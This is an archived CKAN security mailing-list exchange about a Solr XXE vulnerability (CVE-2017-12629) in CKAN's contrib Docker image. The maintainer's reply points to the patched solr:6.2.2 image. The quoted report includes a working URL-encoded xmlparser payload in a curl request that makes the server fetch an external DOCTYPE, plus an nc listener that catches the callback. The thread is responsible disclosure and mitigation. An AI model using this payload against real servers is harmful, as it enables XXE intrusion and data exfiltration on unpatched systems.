[CKAN-Security] solr 6.2

Adrià Mercader adria.mercader at okfn.org
Thu Feb 22 08:55:10 UTC 2018


Hi JD,

Many thanks for the report. We have received reports from this issue and
are preparing patches and/or updates to help mitigate it. If you are using
the Docker image included in contrib the easiest fix is just to use the
solr:6.2.2 image as this one includes the fix for the issue:

https://lucene.apache.org/solr/news.html#18-october-2017-apache-solrtm-662-available

It only includes this bug fix so it should not cause any compatibility
issues.

We will update the image in contrib asap, and let you know of any
mitigation steps that we take.

Best regards,

Adrià

On 21 February 2018 at 08:53, JD Bothma <jd at openup.org.za> wrote:

> Hi
>
> We've contracted someone to pen-test data.vulekamali.gov.za who found the
> following critical vulnerability in CKAN 6.2 as used in the Dockerfile
> under contrib
>
> https://www.cvedetails.com/cve/CVE-2017-12629/
> https://issues.apache.org/jira/browse/SOLR-11477?attachmentOrder=asc
>
> We're launching our portal right now so not comfortable upgrading solr
> just yet, but remapping the xmlparser name to the edismax class has
> mitigated it for us for now. See https://lucene.apache.org/
> solr/news.html#12-october-2017-please-secure-your-
> apache-solr-servers-since-a-zero-day-exploit-has-been-
> reported-on-a-public-mailing-list
>
> I confirmed the vulnerability with the following curl request against a
> locally-running ckan instance:
> curl -v localhost/api/3/action/package_search?q=%7B%
> 21xmlparser%20v%3D%27%3C%21DOCTYPE%20a%20SYSTEM%20%
> 22http%3A%2F%2F172.18.0.1%3A8888%2FDEADBEEF%22%3E%3Ca%3E%3C%2Fa%3E%27%7D
>
> On the IP 172.18.0.1 port 8888 I was running nc -l -p 8888 - when running
> the request against ckan, I saw a GET request in nc. You can also verify
> the vulnerability by looking for "Connection Refused" in the error response
> which shows the server tried to request the DOCTYPE you told it to, and
> would have executed malicious code you would have served.
>
> Best
> JD
>
> _______________________________________________
> CKAN security
> https://lists.okfn.org/mailman/listinfo/security
> https://lists.okfn.org/mailman/options/security/adria.mercader%40okfn.org
>
> Repo: https://github.com/ckan/ckan-security
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.okfn.org/mailman/private/security/attachments/20180222/ed803b5d/attachment-0001.html>


More information about the Security mailing list